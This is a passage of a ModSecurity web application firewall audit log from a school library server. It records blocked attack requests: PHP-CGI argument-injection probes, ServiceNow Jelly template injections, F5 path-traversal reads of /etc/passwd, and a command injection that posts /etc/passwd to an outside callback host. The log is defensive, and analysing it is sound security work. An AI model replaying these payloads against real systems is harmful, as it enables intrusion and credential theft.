"(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312148092911 3299 (- - -) Stopwatch2: 1748312148092911 3299; combined=1641, p1=399, p2=1220, p3=0, p4=0, p5=22, sr=52, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9818815-Z-- --2e34ea1a-A-- [27/May/2025:09:15:49 +0700] aDUgVd6cNBpj1JOkpQlMsgAAAE8 103.236.140.4 52300 103.236.140.4 8181 --2e34ea1a-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/608.2.11 (KHTML, like Gecko) Version/13 Safari/608.2.11 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168677444 --2e34ea1a-C-- --2e34ea1a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e34ea1a-E-- --2e34ea1a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312149755689 2860 (- - -) Stopwatch2: 1748312149755689 2860; combined=1714, p1=343, p2=1334, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e34ea1a-Z-- --4964892f-A-- [27/May/2025:09:15:50 +0700] aDUgVt6cNBpj1JOkpQlMswAAAEc 103.236.140.4 52304 103.236.140.4 8181 --4964892f-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168392447 --4964892f-C-- --4964892f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4964892f-E-- --4964892f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312150504501 16405 (- - -) Stopwatch2: 1748312150504501 16405; combined=26342, p1=519, p2=1651, p3=0, p4=0, p5=12102, sr=81, sw=0, l=0, gc=12070 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4964892f-Z-- --81d7c23c-A-- [27/May/2025:09:15:51 +0700] aDUgV96cNBpj1JOkpQlMtAAAAFQ 103.236.140.4 52308 103.236.140.4 8181 --81d7c23c-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Mobile/15E148 Safari/604.1 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168677447 --81d7c23c-C-- --81d7c23c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81d7c23c-E-- --81d7c23c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312151248837 3946 (- - -) Stopwatch2: 1748312151248837 3946; combined=2100, p1=487, p2=1579, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81d7c23c-Z-- --845ea913-A-- [27/May/2025:09:25:15 +0700] aDUii1uSH_Spa4YU2ZmvwgAAAM8 103.236.140.4 46918 103.236.140.4 8181 --845ea913-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620527 --845ea913-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --845ea913-E-- --845ea913-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312715115209 2183 (- - -) Stopwatch2: 1748312715115209 2183; combined=946, p1=348, p2=566, p3=0, p4=0, p5=31, sr=59, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --845ea913-Z-- --93278b3a-A-- [27/May/2025:09:25:15 +0700] aDUii1uSH_Spa4YU2ZmvwwAAANI 103.236.140.4 46918 103.236.140.4 8181 --93278b3a-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 162464134 --93278b3a-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0q9cd1gpeook7mlf7sg3ds7qrjhe6qp5.oast.live) --93278b3a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93278b3a-E-- --93278b3a-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312715132923 1559 (- - -) Stopwatch2: 1748312715132923 1559; combined=460, p1=308, p2=135, p3=0, p4=0, p5=17, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93278b3a-Z-- --8cd96923-A-- [27/May/2025:09:25:15 +0700] aDUii2TuEZUBy5rh0saCAQAAAAI 103.236.140.4 46920 103.236.140.4 8181 --8cd96923-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166620530 --8cd96923-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8cd96923-E-- --8cd96923-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312715132909 2030 (- - -) Stopwatch2: 1748312715132909 2030; combined=961, p1=306, p2=635, p3=0, p4=0, p5=20, sr=50, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cd96923-Z-- --a04f8b4e-A-- [27/May/2025:09:26:04 +0700] aDUivBLFq2VRfSzm6b8WxQAAAI4 103.236.140.4 47544 103.236.140.4 8181 --a04f8b4e-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168511512 --a04f8b4e-C-- --a04f8b4e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a04f8b4e-E-- --a04f8b4e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312764113676 4161 (- - -) Stopwatch2: 1748312764113676 4161; combined=2350, p1=472, p2=1843, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a04f8b4e-Z-- --72f60c05-A-- [27/May/2025:09:26:06 +0700] aDUivhLFq2VRfSzm6b8WxgAAAJA 103.236.140.4 47548 103.236.140.4 8181 --72f60c05-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166636395 --72f60c05-C-- --72f60c05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f60c05-E-- --72f60c05-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312766130942 3015 (- - -) Stopwatch2: 1748312766130942 3015; combined=1748, p1=368, p2=1353, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f60c05-Z-- --21a6031a-A-- [27/May/2025:09:26:08 +0700] aDUiwGTuEZUBy5rh0saCSQAAAA8 103.236.140.4 47552 103.236.140.4 8181 --21a6031a-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168511515 --21a6031a-C-- --21a6031a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21a6031a-E-- --21a6031a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748312768134873 2937 (- - -) Stopwatch2: 1748312768134873 2937; combined=1780, p1=370, p2=1383, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21a6031a-Z-- --b3837309-A-- [27/May/2025:09:26:10 +0700] aDUiwluSH_Spa4YU2Zmv-QAAANY 103.236.140.4 47556 103.236.140.4 8181 --b3837309-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166636398 --b3837309-C-- --b3837309-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3837309-E-- --b3837309-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748312770094366 3328 (- - -) Stopwatch2: 1748312770094366 3328; combined=1848, p1=349, p2=1462, p3=0, p4=0, p5=37, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3837309-Z-- --a896927c-A-- [27/May/2025:09:47:10 +0700] aDUnrhLFq2VRfSzm6b8W0gAAAIw 103.236.140.4 47710 103.236.140.4 8181 --a896927c-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511575 --a896927c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a896927c-E-- --a896927c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748314030593308 2326 (- - -) Stopwatch2: 1748314030593308 2326; combined=574, p1=437, p2=106, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a896927c-Z-- --54e3e61b-A-- [27/May/2025:09:47:15 +0700] aDUnsxLFq2VRfSzm6b8W0wAAAIk 103.236.140.4 47710 103.236.140.4 8181 --54e3e61b-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511578 --54e3e61b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --54e3e61b-E-- --54e3e61b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity 